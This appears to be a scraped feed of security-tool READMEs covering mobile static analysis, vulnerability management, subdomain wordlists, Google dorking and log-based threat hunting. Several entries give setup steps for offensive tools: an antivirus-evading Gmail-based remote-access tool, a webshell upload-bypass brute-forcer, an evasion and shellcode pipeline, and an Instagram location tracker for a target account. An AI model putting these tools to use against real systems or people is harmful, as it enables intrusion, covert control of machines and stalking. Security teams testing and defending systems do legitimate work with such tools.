logs_[ID].zip\Persistence\agent_settings.db\

Agent Version ≥7.8

Support files from agents running version 7.8 or higher are encrypted, but if you have elevated privileges on the Windows machine, the files can be copied directly from the following directory without encryption.

Method I

C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db\

Method II

Generated Support Files are not deleted regularly, so it might be possible to find old, unencrypted Support Files in the following folder:

C:\Users\[Username]\AppData\Roaming\PaloAltoNetworks\Traps\support\

Agent Version >8.1

Supposedly, since Agent version 8.1, it should no longer be possible to pull the data from the lock files. This has not been tested yet.

Credits

This tool relies on a technique originally released by mr.d0x in April 2022 https://mrd0x.com/cortex-xdr-analysis-and-bypass/

Legal disclaimer

Usage of Cortex-XDR-Config-Extractor for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.



APKHunt - Comprehensive Static Code Analysis Tool For Android Apps That Is Based On The OWASP MASVS Framework


APKHunt is a comprehensive static code analysis tool for Android apps that is based on the OWASP MASVS framework. Although APKHunt is intended primarily for mobile app developers and security testers, it can be used by anyone to identify and address potential security vulnerabilities in their code.

With APKHunt, mobile software architects or developers can conduct thorough code reviews to ensure the security and integrity of their mobile applications, while security testers can use the tool to confirm the completeness and consistency of their test results. Whether you're a developer looking to build secure apps or an infosec tester charged with ensuring their security, APKHunt can be an invaluable resource for your work.

Features

  • Scan coverage: Covers most of the SAST (Static Application Security Testing) related test cases of the OWASP MASVS framework.
  • Multiple APK scanning: Supports scanning multiple APK files in a particular path or folder.
  • Optimised scanning: Specific rules are designed to check for particular security sinks, resulting in a highly accurate scanning process.
  • Low false-positive rate: Designed to pinpoint and highlight the exact location of potential vulnerabilities in the source code.
  • Output format: Results are provided in a TXT file format for easy readability for end-users.

Installation

  1. git clone https://github.com/Cyber-Buddy/APKHunt.git
  2. cd apkhunt
  3. go run apkhunt.go

Requirements:

  • Install Git: sudo apt-get install git
  • Install Golang: sudo apt install golang-go
  • Install JADX: sudo apt-get install jadx
  • Install Dex2jar: sudo apt-get install dex2jar

Limitation:

  • Only supported on Linux environments

Usage

[APKHunt ASCII-art banner]
------------------------------------------------
OWASP MASVS Static Analyzer

APKHunt Usage:
go run APKHunt.go [options] {.apk file}

Options:
-h For help
-p Provide the apk file-path
-m Provide the folder-path for multiple apk scanning
-l For logging (.txt file)

Examples:
APKHunt.go -p /Downloads/android_app.apk
APKHunt.go -p /Downloads/android_app.apk -l
APKHunt.go -m /Downloads/android_apps/
APKHunt.go -m /Downloads/android_apps/ -l

Security test-case coverage

The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.

OWASP MASVS
V1 Architecture, Design and Threat Modeling Requirements
V2 Data Storage and Privacy Requirements
V3 Cryptography Requirements
V4 Authentication and Session Management Requirements
V5 Network Communication Requirements
V6 Environmental Interaction Requirements
V7 Code Quality and Build Setting Requirements
V8 Resiliency & Reverse Engineering Requirements

Upcoming Features

  • Scanning of multiple APK files - DONE
  • More output format such as HTML - In the outer orbit!
  • Integration with third-party tools - Cannot commit!

Contribution

We would love to receive any sort of contribution from the community. Please provide your valuable suggestions or feedback to make this tool even more awesome.

Disclaimer

This project is created to help the infosec community. It is important to respect its core philosophy, values, and intentions. Please refrain from using it for any harmful, malicious, or evil purposes.

License

This project is licensed under the GNU General Public License v3.0

Project Developer

Credits



IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


IpGeo is a Python tool that extracts IP addresses from a captured network traffic file (pcap/pcapng) and generates a CSV report with geolocation details for each IP seen in the packets (a rough sketch of the idea follows the field list below).


The report contains:

  1. Country
  2. Country Code
  3. Region
  4. Region Name
  5. City
  6. Zip
  7. Latitude
  8. Longitude
  9. Timezone
  10. ISP
  11. Org
  12. IP
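Under the hood this amounts to collecting the source and destination addresses from each packet and querying a geolocation API for each unique IP. A rough sketch of the idea, assuming pyshark for packet parsing and the ip-api.com service (whose response fields match the list above; the capture file name is hypothetical):

import pyshark
import requests

ips = set()
cap = pyshark.FileCapture("capture.pcapng")  # hypothetical capture file
for pkt in cap:
    if "IP" in pkt:
        ips.add(pkt.ip.src)
        ips.add(pkt.ip.dst)
cap.close()

for ip in ips:
    geo = requests.get(f"http://ip-api.com/json/{ip}").json()
    print(ip, geo.get("country"), geo.get("city"), geo.get("isp"))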

Installation

Use the package manager pip3 to install required modules.

pip3 install colorama
pip3 install requests
pip3 install pyshark

If you are not using Kali, ParrotOS, or another penetration testing distribution, you need to install Tshark.

sudo apt install tshark

Usage

python3 ipGeo.py
# then you will enter captured traffic file path


SXDork - A Powerful Tool That Utilizes The Technique Of Google Dorking To Search For Specific Information On The Internet


SXDork is a powerful tool that utilizes the technique of google dorking to search for specific information on the internet. Google dorking is a method of using advanced search operators and keywords to uncover sensitive information that is publicly available on the internet. SXDork offers a wide range of options to search for different types of dorks, such as domain login dork, wpadmin dork, SQL dork, configuration file dorks, logfile dorks, dashboard dork, id_rsa dorks, ftp dorks, backup file dorks, mail archive dorks, password dorks, DCIM photos dork, and CCTV dorks.

One of the key features of SXDork is its ability to search dorks using the -s flag. This function allows users to retrieve a significant amount of information related to search keywords. Users can specify specific keywords and the tool will search for all the related information available on the internet. Additionally, users can use the -r flag to set the number of results that will be displayed. The default setting is 10 results, however, users can increase or decrease the number of results as per their requirement. This feature is useful for users who are looking for specific information and want to filter through the results quickly.

SXDork also allows users to search wildcard domains and find a wide range of information. This feature is particularly useful for security researchers, penetration testers and other professionals who need to find sensitive information on the internet. With the ability to search for different types of dorks, wildcard domains and filter through results, SXDork is a powerful tool that can help users find information that is publicly available on the internet.

SXDork has the ability to search for information on multiple domains. By default, the tool searches for information on pastebin.com and controlc.com, but you can easily add more domains to search against. To do this, you can navigate to the src directory and edit the dorks.py file, where you will see an array called src that contains the default domains. Simply add more domains to this array, and the next time you run a search query, SXDork will check all the domains in the array for the keyword you are searching for. This allows you to easily find information across multiple domains.
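For illustration, the src array might look like this after adding a domain (only the first two entries are the documented defaults; the third is an example addition):

# src/dorks.py
src = [
    "pastebin.com",    # default
    "controlc.com",    # default
    "gist.github.com", # example addition
]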

Installation

git clone https://github.com/samhaxr/SXDork.git
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python SXDork.py

Usage

usage: SXDork.py [-h] [-s SEARCH] [-r RESULT] [-dl DOMLOGIN] [-da DOMADMIN]
[-wp WPADMIN] [-lp LPANEL] [-sql SQLFILE] [-cnf CONFILE]
[-log LOGFILE] [-dash DASHBOARD] [-rsa IDRSA] [-ftp FTPFILE]
[-bck BACKUPFILE] [-ma MAILARCHIVE] [-pw PASSWORD]
[-pic PHOTOS] [-cam CCTVCAM]

Search keywords using google dork

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Search keyword with dork
-r RESULT, --result RESULT
Number of output result
-dl DOMLOGIN, --domlogin DOMLOGIN
Search domain(s) for login pages
-da DOMADMIN, --domadmin DOMADMIN
Search domain(s) for admin panels
-wp WPADMIN, --wpadmin WPADMIN
Search domain(s) for wordpress admin
-lp LPANEL, --lpanel LPANEL
Search domain(s) for login panels
-sql SQLFILE, --sqlfile SQLFILE
Search domain(s) for sql database files
-cnf CONFILE, --confile CONFILE
Search domain(s) for configuration files
-log LOGFILE, --logfile LOGFILE
Search domain(s) for log files
-dash DASHBOARD, --dashboard DASHBOARD
Search domain(s) for the dashboard
-rsa IDRSA, --idrsa IDRSA
Search domain(s) for id_rsa pub keys
-ftp FTPFILE, --ftpfile FTPFILE
Search domain(s) for FTP files
-bck BACKUPFILE, --backupfile BACKUPFILE
Search domain(s) for backup files
-ma MAILARCHIVE, --mailarchive MAILARCHIVE
Search domain(s) for mail archives
-pw PASSWORD, --password PASSWORD
Search domain(s) for passwords
-pic PHOTOS, --photos PHOTOS
Search domain(s) for DCIM/Photos
-cam CCTVCAM, --cctvcam CCTVCAM
Search domain(s) for CCTV/CAMs


CVE-Vulnerability-Information-Downloader - Downloads Information From NIST (CVSS), First.Org (EPSS), And CISA (Exploited Vulnerabilities) And Combines Them Into One List


Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities.
Exploit Prediction Scoring System (EPSS) estimates the likelihood that a software vulnerability will be exploited in the wild.
CISA publishes a list of known exploited vulnerabilities.

This project downloads the information from the three sources and combines them into one list.
Scanners show you the CVE number and the CVSS score, but often do not export the full details like "exploitabilityScore" or "userInteractionRequired". By adding the EPSS score you get more options to decide what to fix first and to filter on thresholds that make sense for your environment.
You can use the information to enrich the information provided from your vulnerability scanner like OpenVAS to prioritize remediation.
You can use tools like PowerBI to combine the results from the vulnerability scanner with the information downloaded by the script in the repository.

After the download, the required information is extracted and formatted, and output files are generated.
CVSS, EPSS, and a combined file of all CVE information will be available. Outputs are available in JSON and CSV formats.
Additionally, the information is imported into a SQLite database.

The goal was not performance or efficiency.
Instead, the script is written in a simple way: it proceeds in multiple steps to stay easy to understand and traceable, and files from intermediate steps are written to disk so you can more easily adjust the commands to your needs.
It only uses bash, jq, and sqlite3, to stay very beginner friendly and to demonstrate the usage of jq.
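To make the enrichment idea concrete, here is a minimal Python sketch of the same join (the repository itself uses bash + jq + sqlite3): pull the current EPSS scores and the CISA KEV list from their public endpoints, then look up one CVE.

import csv, gzip, io, json, urllib.request

# Public data sources (the same ones the script downloads from)
EPSS_URL = "https://epss.cyentia.com/epss_scores-current.csv.gz"
KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

def fetch(url):
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    return urllib.request.urlopen(req).read()

# EPSS: gzipped CSV whose first line is a comment header
epss_csv = gzip.decompress(fetch(EPSS_URL)).decode()
reader = csv.DictReader(io.StringIO(epss_csv.split("\n", 1)[1]))
epss = {row["cve"]: row["epss"] for row in reader}

# CISA KEV: JSON document with a "vulnerabilities" array
kev = {v["cveID"] for v in json.loads(fetch(KEV_URL))["vulnerabilities"]}

cve = "CVE-2021-44228"
print(cve, "EPSS:", epss.get(cve), "known exploited:", cve in kev)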


PowerBI Example Dashboard

This repository contains a demo folder with a PowerBI template file. It generates a dashboard which you can adjust to your needs.

The OpenVAS report must be in the csv format for the import to work.

PowerBI will use the created CVE.json file and create a relationship:

You can download PowerBI for free from https://aka.ms/pbiSingleInstaller, and you don't need a Microsoft account to use it.

Configuration

  1. Get an NIST API key: https://nvd.nist.gov/developers/request-an-api-key
  2. cp env_example .env
  3. edit the .env file and add your API key
  4. optional: edit docker-compose file and adjust the cron schedule
  5. optional: edit data/vulnerability-tables-logstash/config/logstash.conf
  6. docker-compose up -d
  7. You will find the files in data/vulnerability-tables-cron/output/ after the script completes (it takes several minutes).

Run

You can either wait for cron to execute the download script on its schedule, or execute the download script manually by running:

docker exec -it vulnerability-tables-cron bash /opt/scripts/download.sh

Container Description

There are three docker containers.
The cron container downloads the information once a week (Monday 06:00) and stores the files in the output directory.
It uses curl and wget to download files; jq is used to work with JSON.

The filebeat container reads the JSON files and forwards them to the logstash container.
The logstash container can be used to send the data to an OpenSearch instance, upload it to Azure Log Analytics, or feed other supported outputs.
Filebeat and logstash are optional and are only included for convenience.

Example output files

Several output files will be generated. Here is an estimate:

316K  CISA_known_exploited.csv
452K  CISA_known_exploited.json
50M   CVSS.csv
179M  CVSS.json
206M  CVE.json
56M   CVE.csv
6.7M  EPSS.csv
12M   EPSS.json
49M   database.sqlite

You can expect this information for every CVE:

grep -i 'CVE-2021-44228' CVE.json | jq
{
"CVE": "CVE-2021-44228",
"CVSS2_accessComplexity": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"CVSS2_accessVector": "NETWORK",
"CVSS2_authentication": "MEDIUM",
"CVSS2_availabilityImpact": "NONE",
"CVSS2_baseScore": "COMPLETE",
"CVSS2_baseSeverity": "COMPLETE",
"CVSS2_confidentialityImpact": "COMPLETE",
"CVSS2_exploitabilityScore": "9.3",
"CVSS2_impactScore": "null",
"CVSS2_integrityImpact": "8.6",
"CVSS2_vectorString": "10",
"CVSS3_attackComplexity": "null",
"CVSS3_attackVector": "null",
"CVSS3_availabilityImpact": "null",
"CVSS3_baseScore": "null",
"CVSS3_baseSeverity": "null",
"CVSS3_confidentialityImpact": "null",
"CVSS3_exploitabilityScore": "null",
"CVSS3_impactScore": "null",
"CVSS3_integrityImpact": "null",
"CVSS3_privilegesRequired": "null",
"CVSS3_scope": "null",
"CVSS3_userInteraction ": "null",
"CVSS3_vectorString": "null",
"CVSS3_acInsufInfo": "null",
"CVSS3_obtainAllPrivilege": "null",
"CVSS3_obtainUserPrivilege": "null",
"CVSS3_obtainOtherPrivilege": "null",
"CVSS3_userInteractionRequired": "null",
"EPSS": "0.97095",
"EPSS_Percentile": "0.99998",
"CISA_dateAdded": "2021-12-10",
"CISA_RequiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available."
}

Links



Tracgram - Use Instagram Location Features To Track An Account


Tracgram uses Instagram location features to track an account.

Usage

At the moment, the usage of Tracgram is extremely simple:

1. Download this repository

2. Go through the installation steps

3. Change the parameters in the tracgram main method directly (see the placeholder snippet after these steps):
+ Mandatory:
- NICKNAME: your Instagram username
- PASSWORD: your Instagram password
- OBJECTIVE: the target username

+ Optional:
- path_to_csv: the path where the CSV file will be stored, including the file name


4. Execute it with python3 tracgram.py
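For illustration, the edited parameters might look like this (all values are placeholders, not real credentials):

# Hypothetical example of the values to edit in tracgram's main method
NICKNAME = "my_instagram_user"      # your Instagram username
PASSWORD = "my_instagram_password"  # your Instagram password
OBJECTIVE = "target_username"       # the account to analyze
path_to_csv = "./locations.csv"     # optional: where the CSV report is written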

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! By now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when the related post was made
    • Link to the Google Maps address
  3. Graph relating the post count for a specific location

  4. Generates an easy-to-process .CSV file



Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


Note:

This RAT communicates via Gmail SMTP (you can use other SMTP providers as well), but Gmail SMTP is a good choice because most companies block unknown traffic, while Gmail traffic is trusted and allowed almost everywhere.

Warning:

 1. Don't upload any payloads to VirusTotal.com, because the tool will stop working over time.
2. VirusTotal shares signatures with AV companies.
3. Again, don't be an idiot!

How To Setup

 1. Create two separate Gmail accounts.
2. Enable SMTP on both accounts (check YouTube if you don't know how).
3. Assuming you now have two separate Gmail accounts with SMTP enabled:
A -> the first account represents Your_1st_gmail@gmail.com
B -> the second account represents your_2nd_gmail@gmail.com
4. Go to the server.py file and fill in the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Go to the client.py file and fill in the following at line 16:
imapserver = "imap.gmail.com" (don't change this)
username = "your_2nd_gmail@gmail.com"
password = "your_2nd_gmail_app_password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don't change this)
6. Enjoy.

How To Run:-

 *:- For Windows:-
1. Make sure python3 and pip are installed, along with the requirements.
2. python server.py (on the server side)


*:- For Linux:-
1. Make sure all requirements are installed.
2. python3 server.py (on the server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD ratio 0/40
2) Bypasses EDR solutions
3) Bypasses network restrictions
4) Commands are sent Base64-encoded and decoded on the server side
5) No more raw TCP connections

Warning:-

Use this tool for educational purposes only. I will not be responsible for your cruel acts.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, sublist3r, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bug bounty programs that were collected by chaos.projectdiscovery.io and bounty-targets-data, or that simply had responsible disclosure programs - 4095 domains in total! If a subdomain appears in more than 5-10 different scopes, it is put into a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears within *.google.com. That's all - nothing more, nothing less.
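A toy sketch of that counting rule (a word counts once per scope, regardless of how often it repeats inside the scope):

from collections import Counter

scopes = {
    "google.com": ["dev.stg.google.com", "dev.stg.mail.google.com"],
    "twitter.com": ["dev.stg.twitter.com"],
}

freq = Counter()
for scope, subdomains in scopes.items():
    # deduplicate within a scope so each prefix counts at most once per scope
    prefixes = {fqdn.removesuffix("." + scope) for fqdn in subdomains}
    freq.update(prefixes)

print(freq)  # Counter({'dev.stg': 2, 'dev.stg.mail': 1})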

You can find the complete list of sources here

Lists

Subdomains

In these lists you will find the most popular subdomains as-is.

Name                     Words count  Size
subdomains.txt.gz        21901389     501MB
subdomains_top100.txt    100          706B
subdomains_top1000.txt   1000         7.2KB
subdomains_top10000.txt  10000        70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. For example, the dev.stg subdomain will be split into two words, dev and stg; dev will have level = 2 and stg level = 1 (see the short sketch after the table below). You can use these wordlists for combinatory attacks in subdomain searches. There are several types of level.txt wordlists, following the same idea as the subdomain lists.

Name                 Words count  Size
level_1.txt.gz       8096054      153MB
level_2.txt.gz       7556074      106MB
level_3.txt.gz       1490999      18MB
level_4.txt.gz       205969       3.2MB
level_5.txt.gz       71716        849KB
level_1_top100.txt   100          633B
level_1_top1000.txt  1000         6.6KB
level_2_top100.txt   100          550B
level_2_top1000.txt  1000         5.6KB
level_3_top100.txt   100          531B
level_3_top1000.txt  1000         5.1KB
level_4_top100.txt   100          525B
level_4_top1000.txt  1000         5.0KB
level_5_top100.txt   100          449B
level_5_top1000.txt  1000         5.0KB
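The level numbering works as in this short sketch:

# dev.stg -> stg is level 1 (closest to the apex domain), dev is level 2
sub = "dev.stg"
for level, word in enumerate(reversed(sub.split(".")), start=1):
    print(level, word)
# 1 stg
# 2 dev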

Popular split subdomains

In these lists, you will find the most popular split words from subdomains across all levels. For example, the dev.stg subdomain will be split into two words, dev and stg.

Name                Words count  Size
words.txt.gz        17229401     278MB
words_top100.txt    100          597B
words_top1000.txt   1000         5.5KB
words_top10000.txt  10000        62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Reverseip_Py - Domain Parser For IPAddress.com Reverse IP Lookup


Domain parser for IPAddress.com Reverse IP Lookup. Written in Python 3.

What is Reverse IP?

Reverse IP refers to the process of looking up all the domain names that are hosted on a particular IP address. This can be useful for a variety of reasons, such as identifying all the websites that are hosted on a shared hosting server or finding out which websites are hosted on the same IP address as a particular website.


Requirements

  • beautifulsoup4
  • requests
  • urllib3

Tested on Debian with Python 3.10.8

Install Requirements

pip3 install -r requirements.txt

How to Use

Help Menu

python3 reverseip.py -h
usage: reverseip.py [-h] [-t target.com]

options:
-h, --help show this help message and exit
-t target.com, --target target.com
Target domain or IP

Reverse IP

python3 reverseip.py -t google.com
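The scraping approach behind a tool like this can be sketched as follows; note that the URL pattern and the CSS selector here are assumptions about IPAddress.com's markup for illustration, not the script's verified internals:

import requests
from bs4 import BeautifulSoup

def reverse_ip(target):
    url = f"https://www.ipaddress.com/reverse-ip/{target}"  # assumed endpoint
    html = requests.get(url, headers={"User-Agent": "Mozilla/5.0"}, timeout=15).text
    soup = BeautifulSoup(html, "html.parser")
    # assumed: result domains are rendered as links inside an ordered result list
    return [a.get_text(strip=True) for a in soup.select("ol li a")]

print(reverse_ip("google.com"))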

Disclaimer

Any actions and/or activities related to the material contained within this tool are solely your responsibility. Misuse of the information in this tool can result in criminal charges being brought against the persons in question.

Note: modifications or changes to this code are acceptable; however, every public release that uses this code must be approved by the author of this tool (yuyudhn).



Faraday - Open Source Vulnerability Management Platform


Security has two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve remediation efforts. With Faraday, you may focus on discovering vulnerabilities while we help you with the rest. Just use it in your terminal and get your work organized on the run. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday aggregates and normalizes the data you load, allowing you to explore it through different visualizations that are useful to managers and analysts alike.

To read about the latest features check out the release notes!


Install

Docker-compose

The easiest way to get faraday up and running is using our docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml
$ docker-compose up

If you want to customize, you can find an example config over here Link

Docker

You need to have a Postgres running first.

 $ docker run \
-v $HOME/.faraday:/home/faraday/.faraday \
-p 5985:5985 \
-e PGSQL_USER='postgres_user' \
-e PGSQL_HOST='postgres_ip' \
-e PGSQL_PASSWD='postgres_password' \
-e PGSQL_DBNAME='postgres_db_name' \
faradaysec/faraday:latest

PyPi

$ pip3 install faradaysec
$ faraday-manage initdb
$ faraday-server

Binary Packages (Debian/RPM)

You can find the installers on our releases page

$ sudo apt install faraday-server_amd64.deb
# Add your user to the faraday group
$ faraday-manage initdb
$ sudo systemctl start faraday-server

Add your user to the faraday group and then run

Source

If you want to run directly from this repo, this is the recommended way:

$ pip3 install virtualenv
$ virtualenv faraday_venv
$ source faraday_venv/bin/activate
$ git clone git@github.com:infobyte/faraday.git
$ pip3 install .
$ faraday-manage initdb
$ faraday-server

Check out our documentation for detailed information on how to install Faraday in all of our supported platforms

For more information about the installation, check out our Installation Wiki.

In your browser, you can now go to http://localhost:5985 and log in with "faraday" as the username and the password given by the installation process.

Getting Started

Learn about Faraday's holistic approach and rethink vulnerability management.

Integrating faraday in your CI/CD

Setup Bandit and OWASP ZAP in your pipeline

Setup Bandit, OWASP ZAP and SonarQube in your pipeline

Faraday Cli

Faraday-cli is our command line client; it provides easy access to the console tools and lets you work with Faraday directly from the terminal!

This is a great way to automate scans, integrate Faraday into your CI/CD pipeline, or just get metrics from a workspace.

$ pip3 install faraday-cli

Check our faraday-cli repo

Check out the documentation here.


Faraday Agents

Faraday Agents Dispatcher is a tool that gives Faraday the ability to run scanners or tools remotely from the platform and get the results.

Plugins

Connect your favorite tools through our plugins. Right now there are more than 80 supported tools, among which you will find:


Missing your favorite one? Create a Pull Request!

There are two Plugin types:

Console plugins which interpret the output of the tools you execute.

$ faraday-cli tool run \"nmap www.exampledomain.com\"
💻 Processing Nmap command
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-22 14:13 -03
Nmap scan report for www.exampledomain.com (10.196.205.130)
Host is up (0.17s latency).
rDNS record for 10.196.205.130: 10.196.205.130.bc.example.com
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
2222/tcp open EtherNetIP-1
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
⬆ Sending data to workspace: test
✔ Done

Report plugins, which allow you to import previously generated artifacts like XMLs and JSONs.

faraday-cli tool report burp.xml

Creating custom plugins is super easy. Read more about Plugins.

API

You can access our API directly; check out the documentation here.

Links



ThreatHound - Tool That Help You On Your IR & Threat Hunting And CA


This tool will help you with your IR, Threat Hunting, and Compromise Assessment (CA): just drop your event log files and analyze the results.


New Release Features:

  • Supports Windows (ThreatHound.exe)
  • A new version is also available in C for Linux-based systems
  • You can save the results to a JSON file or print them on screen via the 'print' argument ('yes' prints the results on screen, 'no' saves them to a JSON file)
  • You can pass a Windows event logs folder, a single evtx file, or multiple evtx files separated by commas via the -p argument
  • You can pass a Sigma rules path via the -s argument
  • Multithreading was added to improve running speed
  • ThreatHound.exe is agent-based; you can push it to and run it on multiple servers
  • Example:
$ ThreatHound.exe -s ..\sigma_rules\ -p C:\Windows\System32\winevt\Logs\ -print no
  • NOTE: give cmd full permission to read from "C:\Windows\System32\winevt\Logs"

  • Linux Based:

  • Windows Based

I’ve built the following (a toy sketch of the matching idea follows this list):

  • A dedicated backend to support Sigma rules for python
  • A dedicated backend for parsing evtx for python
  • A dedicated backend to match between evtx and the Sigma rules
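A toy sketch of the matching idea, assuming the python-evtx package (ThreatHound's real backends are more involved):

from Evtx.Evtx import Evtx  # pip install python-evtx

rule_keywords = ["mimikatz", "sekurlsa::"]  # stand-in for a parsed Sigma rule

with Evtx("Security.evtx") as log:
    for record in log.records():
        xml = record.xml()
        # naive keyword match over the record's XML rendering
        if any(k.lower() in xml.lower() for k in rule_keywords):
            print("[match] record", record.record_num())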

Features of the tool:

  • Automation of Threat Hunting, Compromise Assessment, and Incident Response for Windows Event Logs
  • Downloads and updates the Sigma rules daily from the source
  • More than 50 detection rules included
  • Support for more than 1500 Sigma detection rules
  • New Sigma rules can be added dynamically to the detection rules
  • All outputs are saved in JSON format
  • Easily add any detection rules you prefer
  • New event log source types can be added easily in mapping.py

To-do:

  • Support for Sigma rules dedicated for DNS query
  • Improving the speed of the detection algorithm
  • Adding JSON output that supports Splunk
  • More features

Installation:

$ git clone https://github.com/MazX0p/ThreatHound.git
$ cd ThreatHound
$ pip install -r requirements.txt
$ python3 ThreatHound.py
  • Note: glob doesn't support getting a directory path that has spaces in folder names, so please ensure the tool's path contains no spaces (folder names)

Demo:

https://player.vimeo.com/video/784137549?h=6a0e7ea68a&badge=0&autopause=0&player_id=0&app_id=58479

Screenshots:



Upload_Bypass_Carnage - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!


File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!

POC video:

File upload restrictions bypass, by using different bug bounty techniques! The tool must be run with all its assets! An example invocation follows the options list below.


Installation:

pip3 install -r requirements.txt

Usage: upload_bypass.py [options]

Options: -h, --help

  show this help message and exit

-u URL, --url=URL

  Supply the login page, for example: -u http://192.168.98.200/login.php

-s , --success

 Success message shown when an image is uploaded, for example: -s 'Image uploaded successfully.'

-e , --extension

 Provide the server's backend extension, for example: --extension php (supported extensions: php, asp, jsp, perl, coldfusion)

-a , --allowed

 Provide allowed extensions to be uploaded, for example: php,asp,jsp,perl

-H , --header

 (Optional) - For example: '"X-Forwarded-For":"10.10.10.10"' - Use double quotes around the data and wrap it all in single quotes. Use a comma to separate multiple headers.

-l , --location

 (Optional) - Supply the remote path where the webshell is supposed to be. For example: /uploads/

-S, --ssl

 (Optional) - No checks for TLS or SSL

-p, --proxy

 (Optional) - Channel the requests through proxy

-c, --continue

 (Optional) - If set, the brute force will continue even if one or more methods are found!

-v, --verbose

 (Optional) - Printing the http response in terminal

-U , --username

 (Optional) - Username for authentication. For example: --username admin

-P , --password

 (Optional) - Password for authentication. For example: --password 12345
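Putting the options together, an illustrative invocation could look like this (all values are placeholders):

python3 upload_bypass.py -u http://192.168.98.200/login.php -s 'Image uploaded successfully.' -e php -a jpg,png -l /uploads/ -U admin -P 12345 -v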


OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises


OffensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises.
A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.


Features

  • Currently only supports C# (.Net Framework) projects
  • Allows cloning of public and private (you will need credentials :D) git repositories
  • Allows working with local folders
  • Randomizes project GUIDs
  • Randomizes application information contained in AssemblyInfo
  • Builds C# projects
  • Obfuscates generated binaries
  • Generates shellcodes from binaries
  • There are 79 tools parameterised in YML templates (not all of them may work :D)
  • New tools can be added using YML templates
  • It should be easy to add new plugins...

What's new in version 2.0

  • Almost complete code rewrite (new bugs?)
  • Cloning from private repositories possible (authentication via GitHub authToken)
  • Possibility to copy a local folder instead of cloning from a remote repository
  • New module to generate shellcodes with Donut
  • New module to randomize GUIDs of applications
  • New module to randomize the AssemblyInfo of each application
  • 60 new tools added

Examples

  • List all tools:
OffensivePipeline.exe list
  • Build all tools:
OffensivePipeline.exe all
  • Build a tool
OffensivePipeline.exe t toolName
  • Clean cloned and built tools:
OffensivePipeline.exe clean

Output example

PS C:\OffensivePipeline> .\OffensivePipeline.exe t rubeus

ooo
.osooooM M
___ __ __ _ ____ _ _ _ +y. M M
/ _ \ / _|/ _| ___ _ __ ___(_)_ _____| _ \(_)_ __ ___| (_)_ __ ___ :h .yoooMoM
| | | | |_| |_ / _ \ '_ \/ __| \ \ / / _ \ |_) | | '_ \ / _ \ | | '_ \ / _ \ oo oo
| |_| | _| _| __/ | | \__ \ |\ V / __/ __/| | |_) | __/ | | | | | __/ oo oo
\___/|_| |_| \___|_| |_|___/_| \_/ \___|_| |_| .__/ \___|_|_|_| |_|\___| oo oo
|_| MoMoooy. h:
M M .y+
M Mooooso.
ooo

@aetsu
v2.0.0


[+] Loading tool: Rubeus
Clonnig repository: Rubeus into C:\OffensivePipeline\Git\Rubeus
Repository Rubeus cloned into C:\OffensivePipeline\Git\Rubeus

[+] Load RandomGuid module
Searching GUIDs...
> C:\OffensivePipeline\Git\Rubeus\Rubeus.sln
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
Replacing GUIDs...
